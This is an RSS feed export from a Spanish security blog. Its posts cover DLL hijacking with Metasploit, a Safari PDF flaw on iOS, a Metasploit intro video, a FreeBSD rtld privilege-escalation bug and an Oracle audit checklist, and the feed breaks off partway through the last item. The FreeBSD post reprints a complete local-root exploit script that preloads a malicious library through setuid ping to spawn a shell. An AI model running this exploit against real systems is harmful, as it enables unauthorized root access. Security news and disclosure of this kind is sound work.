<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; sistema</title> <atom:link href="http://www.dragonjar.org/tag/sistema/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>DLL Hijacking con Metasploit</title><link>http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml</link> <comments>http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml#comments</comments> <pubDate>Sun, 29 Aug 2010 20:33:26 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Desarrollo]]></category> <category><![CDATA[DLL Hijacking]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[Framework]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[metasploit framework]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[Vulnerables]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4870</guid> <description><![CDATA[Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los  sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/09/DLL.jpg" width="240" title="DLL Hijacking con Metasploit" alt="DLL DLL Hijacking con Metasploit" /></p><p>Aunque no es algo nuevo, últimamente se habla mucho sobre <a
href="http://www.dragonjar.org/tag/dll-hijacking" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con DLL Hijacking">DLL Hijacking</a> o suplantación de librerías DLL, gracias al reciente <a
href="http://www.hispasec.com/unaaldia/4322/microsoft-confirma-grave-problema-seguridad-compartido">fallo de los  sistemas Microsoft Windows</a> que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articulo<a
href="http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html">Exploiting DLL Hijacking Flaws</a>, también ha publicado un kit, para buscar aplicaciones que puedan ser <a
href="http://www.dragonjar.org/tag/vulnerables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerables">vulnerables</a> a este tipo de ataque <a
href="http://blog.metasploit.com/2010/08/better-faster-stronger.html">DLLHijaAuditKit</a>.</p><p>Precisamente en esta ocasión les traigo un vídeo de Offensive Security, donde nos enseñan como aprovechar este fallo en <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Office 2007 utilizando el <a
href="http://www.dragonjar.org/tag/metasploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Metasploit">Metasploit</a> <a
href="http://www.dragonjar.org/tag/framework" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Framework">Framework</a>.</p><p
style="text-align: center;"><iframe
src="http://player.vimeo.com/video/14391242" width="550" height="450" frameborder="0"></iframe></p><p>Microsoft ha<a
href=" http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attcoack-vector.aspx"> publicado una solución temporal al fallo (catalogado como critico)</a>, pero la solución es que los desarrolladores empiecen a<a
href=" http://msdn.microsoft.com/en-us/library/ff919712(VS.85).aspx"> utilizar metodologías de desarrollo seguras</a>, para evitar que sus aplicaciones sean vulnerables.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/metasploit-framework-32-portable-para-windows.xhtml" title="Metasploit Framework 3.2 Portable para Windows">Metasploit Framework 3.2 Portable para Windows</a></li><li><a
href="http://www.dragonjar.org/metasploit-framework-portable.xhtml" title="Metasploit Framework Portable">Metasploit Framework Portable</a></li><li><a
href="http://www.dragonjar.org/video-tutoriales-de-metasploit-framework.xhtml" title="Video Tutoriales de Metasploit Framework">Video Tutoriales de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-set-social-engineering-toolkit.xhtml" title="Video Tutorial SET (Social Engineering Toolkit)">Video Tutorial SET (Social Engineering Toolkit)</a></li><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework-en-espanol.xhtml" title="Manual de Metasploit Framework en Español">Manual de Metasploit Framework en Español</a></li><li><a
href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml/feed</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</title><link>http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml</link> <comments>http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml#comments</comments> <pubDate>Sun, 01 Aug 2010 08:18:01 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad móvil]]></category> <category><![CDATA[Actualizaciones]]></category> <category><![CDATA[Actualizar]]></category> <category><![CDATA[Archivos]]></category> <category><![CDATA[Efecto]]></category> <category><![CDATA[Instalar]]></category> <category><![CDATA[IPhone]]></category> <category><![CDATA[Ipod]]></category> <category><![CDATA[Ipod Touch]]></category> <category><![CDATA[jailbreak]]></category> <category><![CDATA[Liberar]]></category> <category><![CDATA[Móviles]]></category> <category><![CDATA[Navegador]]></category> <category><![CDATA[Navegar]]></category> <category><![CDATA[Oficial]]></category> <category><![CDATA[Opera]]></category> <category><![CDATA[Parche]]></category> <category><![CDATA[PDF]]></category> <category><![CDATA[Proteger]]></category> <category><![CDATA[Recomendaciones]]></category> <category><![CDATA[Safari]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[Vulnerabilidad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4782</guid> <description><![CDATA[Hace poco vimos como un miembro del Dev-Team mas conocido como @comex nos presentaba un nuevo método de Jailbreak que permitía realizar este procedimiento en cualquier iPhone, iPod Touch e iPad el procedimiento es bastante simple, basta con navegar desde nuestro Safari en una pagina especialmente diseñada, deslizar nuestro dedo y en poco tiempo tendremos [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/08/PDFSafari.jpg" width="240" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad" alt="PDFSafari Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad" /></p><p>Hace poco vimos como un <a
href="http://blog.iphone-dev.org/">miembro del Dev-Team</a> mas conocido como <a
href="http://twitter.com/comex" target="_blank">@comex</a> nos presentaba un nuevo método de <a
title="Jailbreak a Cualquier iPhone, iPod Touch e iPad" rel="bookmark" href="../jailbreak-a-cualquier-iphone-ipod-touch-e-ipad.xhtml">Jailbreak que permitía realizar este procedimiento en cualquier iPhone, iPod Touch e iPad</a> el procedimiento es bastante simple, basta con <a
href="http://www.dragonjar.org/tag/navegar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegar">navegar</a> desde nuestro Safari en una pagina especialmente diseñada, deslizar nuestro dedo y en poco tiempo tendremos el &#8220;Jailbrekeado&#8221; nuestro dispositivo.</p><p
style="text-align: center;"><img
class="alignnone" title="Proteger tu dispositivo" src="http://www.dragonjar.org/wp-content/uploads/2010/08/PDFSafari.jpg" alt="PDFSafari Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad" width="300" height="451" /></p><p>En realidad lo que hace el JailbreakMe es explotar una vulnerabilidad en la forma como maneja  los <a
href="http://www.dragonjar.org/tag/archivos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Archivos">archivos</a> <a
href="http://www.dragonjar.org/tag/pdf" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PDF">PDF</a> el navegador Safari Mobile, utilizado en los dispositivos móviles de Apple (<a
href="http://www.dragonjar.org/tag/iphone" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IPhone">iPhone</a>, <a
href="http://www.dragonjar.org/tag/ipod" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ipod">iPod</a> Touch, iPad) para ejecutar código arbitrario, en este caso ejecutar el instalador del Jailbreak.<span
id="more-4782"></span></p><p>En esta ocasión han explotado una vulnerabilidad en nuestro sistema, para realizar algo que deseábamos (<a
href="http://www.dragonjar.org/tag/liberar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Liberar">liberar</a> nuestro dispositivo), pero.. ¿que pasaría si una persona mal intencionada aprovecha esta vulnerabilidad?&#8230; la respuesta es que podría tomar total control de tu gadget favorito para hacer con el lo que quiera.</p><p>De momento Apple no ha publicado un parche oficial para solucionar este problema de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, pero afortunadamente Will Strafach un colaborador del proyecto Cydia, ha publicado una solución no oficial para resolver este fallo de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, para instalarlo irónicamente tendrías que tener &#8220;<strong>Jailbreakeado</strong>&#8221; tu dispositivo y desde Cydia <a
href="http://www.dragonjar.org/tag/instalar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Instalar">instalar</a> el hack &#8220;<strong>PDF Loading Warner</strong>&#8220;, lo que hace este parche es pedirnos una confirmación en el Safari, cada vez que queramos abrir un archivo PDF (en vez de abrirlo sin pedir permiso como lo hace por defecto).</p><p><strong>Algunas Recomendaciones:</strong></p><ul><li>Utilizar un navegador alternativo a Safari Mobile (<a
href="http://itunes.apple.com/us/app/opera-mini-web-browser/id363729560?mt=8">recomiendo Opera Mini</a>)</li><li>No abrir ningún archivo PDF desde tu dispositivo móvil.</li><li>Instalar el hack &#8220;<strong>PDF Loading Warner</strong>&#8221; desde Cydia (<a
href="http://www.dragonjar.org/jailbreak-a-cualquier-iphone-ipod-touch-e-ipad.xhtml">necesitas realizar el jailbreak en tu equipo</a>)</li><li><a
href="http://www.dragonjar.org/tag/actualizar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Actualizar">Actualizar</a> a la ultima versión del iOS (al parecer pronto llegara la versión 4.1 del iOS, donde se soluciona este problema)</li></ul><p>Espero que estés pendientes de las nuevas actualizaciones al iOS y de los archivos que abres en el navegador de tu iPhone, iPod Touch o iPad.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li><li><a
href="http://www.dragonjar.org/desbloquea-o-actualiza-el-iphone-os-3-0.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch</a></li><li><a
href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a
href="http://www.dragonjar.org/desbloquear-ipod-touch-2g.xhtml" title="Desbloquear iPod Touch 2G Fácilmente">Desbloquear iPod Touch 2G Fácilmente</a></li><li><a
href="http://www.dragonjar.org/jailbreak-a-cualquier-iphone-ipod-touch-e-ipad.xhtml" title="Jailbreak a Cualquier iPhone, iPod Touch e iPad">Jailbreak a Cualquier iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/soporte-para-flash-y-java-en-el-iphone-ipod-touch.xhtml" title="Soporte para Flash y JAVA en el iPhone / iPod Touch">Soporte para Flash y JAVA en el iPhone / iPod Touch</a></li><li><a
href="http://www.dragonjar.org/crackear-redes-inalambricas-desde-el-iphone-o-ipod-touch.xhtml" title="Crackear redes inalámbricas desde el iPhone o iPod Touch">Crackear redes inalámbricas desde el iPhone o iPod Touch</a></li><li><a
href="http://www.dragonjar.org/desbloquea-jailbreak-ipod-touch-2g.xhtml" title="Desbloquea (Jailbreak) el iPod Touch 2G e iPhone en Mac">Desbloquea (Jailbreak) el iPod Touch 2G e iPhone en Mac</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Vídeo: Introducción al Metasploit Framework</title><link>http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml</link> <comments>http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml#comments</comments> <pubDate>Wed, 20 Jan 2010 05:16:04 +0000</pubDate> <dc:creator>Epsilon</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Seguridad inalámbrica]]></category> <category><![CDATA[Framework]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Herramientas]]></category> <category><![CDATA[Manuales]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[metasploit framework]]></category> <category><![CDATA[metasploit tutorial]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[seguridad informa]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[using metasploit]]></category> <category><![CDATA[Video]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3700</guid> <description><![CDATA[Todo aquel individuo que este relacionado con el mundo de la seguridad informática,  debe manejar o por lo menos conocer el metasploit framework,  esta herramienta es fundamental y debe estar en todo &#8220;kit de herramientas&#8221; de cualquier consultor u auditor de la seguridad de la informacion. Por otra parte, los usuarios que apenas comienzan a [...]]]></description> <content:encoded><![CDATA[<p>Todo aquel individuo que este relacionado con el mundo de la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> informática,  debe manejar o por lo menos conocer el <a
href="http://www.dragonjar.org/tag/metasploit-framework" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con metasploit framework">metasploit framework</a>,  esta <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> es fundamental y debe estar en todo &#8220;kit de <a
href="http://www.dragonjar.org/tag/herramientas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramientas">herramientas</a>&#8221; de cualquier consultor u auditor de la seguridad de la informacion.</p><p
style="text-align: center;"><img
class="alignnone" title="Metasploit Framework Video Tutorial" src="http://i.imgur.com/fFiYp.jpg" alt="fFiYp Vídeo: Introducción al Metasploit Framework" width="300" height="215" /></p><p>Por otra parte, los usuarios que apenas comienzan a indagar sobre la seguridad en los sistemas y que han escuchado hablar sobre el <a
href="http://www.dragonjar.org/tag/metasploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Metasploit">metasploit</a>, preguntan frecuentemente si existe un gran manual  de este <a
href="http://www.dragonjar.org/tag/framework" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Framework">framework</a>, el cual sea entendible y completo, en la red existen varios <a
href="http://www.dragonjar.org/tag/manuales" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Manuales">manuales</a> de esta aplicacion,  por ejemplo:</p><p><span
id="more-3700"></span></p><ul><li><a
href="http://www.metasploit.com/documents/users_guide.pdf">Metasploit Framework &#8211; User guide (guia oficial)</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml">Manual de Metasploit </a></li><li><a
href="http://www.amazon.com/Metasploit-Penetration-Development-Vulnerability-Research/dp/1597490741/ref=sr_1_1?ie=UTF8&amp;s=books&amp;qid=1263879380&amp;sr=1-1">Libro &#8211; Metasploit toolkit</a></li></ul><p>Sin embargo, como dicen : &#8221; una imagen vale mas que mil palabras&#8221; o en este caso un vídeo,  ya que  la gente de <a
href="http://www.amazon.com/Metasploit-Penetration-Development-Vulnerability-Research/dp/1597490741/ref=sr_1_1?ie=UTF8&amp;s=books&amp;qid=1263879380&amp;sr=1-1">Room362</a> ha publicado un excelente vídeo sobre los fundamentos básicos del proyecto metasploit. Este vídeo quizás es un paso obligado para todos nosotros los newbies en el apasionante  campo de la seguridad informática.</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://www.youtube.com/v/RxyD0F38WYg&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/RxyD0F38WYg&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework-en-espanol.xhtml" title="Manual de Metasploit Framework en Español">Manual de Metasploit Framework en Español</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/video-tutoriales-de-wireshark.xhtml" title="Video Tutoriales de Wireshark">Video Tutoriales de Wireshark</a></li><li><a
href="http://www.dragonjar.org/video-tutoriales-de-metasploit-framework.xhtml" title="Video Tutoriales de Metasploit Framework">Video Tutoriales de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/ssdownloader-gestor-de-descargas-para-herramientas-de-seguridad.xhtml" title="SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad">SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-set-social-engineering-toolkit.xhtml" title="Video Tutorial SET (Social Engineering Toolkit)">Video Tutorial SET (Social Engineering Toolkit)</a></li><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml/feed</wfw:commentRss> <slash:comments>11</slash:comments> </item> <item><title>Fallo en FreeBSD permite obtener root</title><link>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml</link> <comments>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml#comments</comments> <pubDate>Tue, 01 Dec 2009 08:54:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Pentest]]></category> <category><![CDATA[BSD]]></category> <category><![CDATA[FreeBSD]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[variables]]></category> <category><![CDATA[Vulnerabilidad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3442</guid> <description><![CDATA[Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo. El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica [...]]]></description> <content:encoded><![CDATA[<p>Acaba de hacerse publica una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> descubierta por Nikolaos Rangos en los sistemas <a
href="http://www.dragonjar.org/tag/freebsd" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con FreeBSD">FreeBSD</a> que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a> operativo.</p><p
style="text-align: center;"><img
class="alignnone" title="Bug en FreeBSD" src="http://imgur.com/HNx9D.jpg" alt="HNx9D Fallo en FreeBSD permite obtener root" width="200" height="223" /></p><p>El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite <a
href="http://www.dragonjar.org/tag/variables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con variables">variables</a> de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte <a
href="http://www.dragonjar.org/tag/variables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con variables">variables</a> LD, incluso en los binarios setugid.<span
id="more-3442"></span><br
/> VERSIONES DE FREEBSD AFECTADAS<br
/> **********************************<br
/> FreeBSD 8.0-RELEASE *** VULNERABLE<br
/> FreeBSD 7.1-RELEASE *** VULNERABLE<br
/> FreeBSD 6.3-RELEASE *** NO VULNERABLE<br
/> FreeBSD 4.9-RELEASE *** NO VULNERABLE</p><p>Para más detalles ver el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a>.</p><p><code>#!/bin/sh<br
/> echo ** FreeBSD local r00t zeroday<br
/> echo by Kingcope<br
/> echo November 2009<br
/> cat &gt; env.c &lt;&lt; _EOF<br
/> #include </code></p><p><code>main() {<br
/> extern char **environ;<br
/> environ = (char**)malloc(8096);</code></p><p><code>environ[0] = (char*)malloc(1024);<br
/> environ[1] = (char*)malloc(1024);<br
/> strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");</code></p><p><code>execl("/sbin/ping", "ping", 0);<br
/> }<br
/> _EOF<br
/> gcc env.c -o env<br
/> cat &gt; program.c &lt;&lt; _EOF<br
/> #include<br
/> #include<br
/> #include<br
/> #include</code></p><p><code>void _init() {<br
/> extern char **environ;<br
/> environ=NULL;<br
/> system("echo ALEX-ALEX;/bin/sh");<br
/> }<br
/> _EOF</code></p><p>Para compilar y ejecutar</p><p><code>gcc -o program.o -c program.c -fPIC<br
/> gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles<br
/> cp w00t.so.1.0 /tmp/w00t.so.1.0<br
/> ./env</code></p><p>Mas Información en el <a
href="http://seclists.org/fulldisclosure/2009/Nov/371">Full Disclosure publicado por Nikolaos Rangos</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-routers-thomson-a-fondo.xhtml" title="Vulnerabilidad en Routers Thomson a Fondo">Vulnerabilidad en Routers Thomson a Fondo</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</title><link>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml</link> <comments>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml#comments</comments> <pubDate>Fri, 13 Nov 2009 08:39:23 +0000</pubDate> <dc:creator>D7n0s4ur70</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Auditoria]]></category> <category><![CDATA[Base de Datos]]></category> <category><![CDATA[Oracle]]></category> <category><![CDATA[Server]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[SQL]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3336</guid> <description><![CDATA[Cuando se realiza una auditoria, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una base de datos oracle. 1). Determinar si en [...]]]></description> <content:encoded><![CDATA[<p>Cuando se realiza una <a
href="http://www.dragonjar.org/tag/auditoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Auditoria">auditoria</a>, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">base de datos</a> <a
href="http://www.dragonjar.org/tag/oracle" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Oracle">oracle</a>.</p><p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2476/4100282916_b0e4fe2de0_o.jpg" alt="4100282916 b0e4fe2de0 o ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?"  title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?" /></p><p><strong>1).</strong> Determinar si en la BD esta activo el modo de operación en ARCHIVELOG o NONARCHIVELOG. Si este no esta activo, la evidencia de ataque o cambios serán sobrescritos por un nuevo redo.</p><p>Se puede determinar realizando una sentencia <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a> a la BD:</p><ul><li>SELECT VALUE V$PARAMETER WHERE FROM NAME=&#8217;archiv_log_start&#8217;;</li></ul><p><strong><span
id="more-3336"></span>2).</strong> Análisis de los Oracle Data Blocks, para determinar:</p><ul><li>Registros eliminados</li><li>Localizar bloques asignados a tablas (OBJETOS DE INTERÉS)</li><li>Seguimiento de Objetos creados y eliminados</li><li>Localización de tablas eliminadas</li><li>Localización de Funciones eliminadas</li></ul><p><strong>3).</strong> Obtención del SID de la BD</p><p><strong>4).</strong> Enumeración de usuarios</p><ul><li> SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li> SELECT USERID, COMMENT$TEXT FROM SYS.AUD$;</li></ul><p><strong>5).</strong> Consultar Ataques de Fuerza bruta o Diccionario a cuentas de usuario</p><ul><li>SQL&gt; SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT NAME, LCOUNT FROM USER$ WHERE LCOUNT&gt;0;</li><li>SELECT NAME, LTIME FROM USER$ WHERE ASTATUS = 4;</li></ul><p><strong>6).</strong> Consulta de Ataques de Fuerza Bruta a la cuenta SYS</p><p><strong>7).</strong> Consulta de intentos del <a
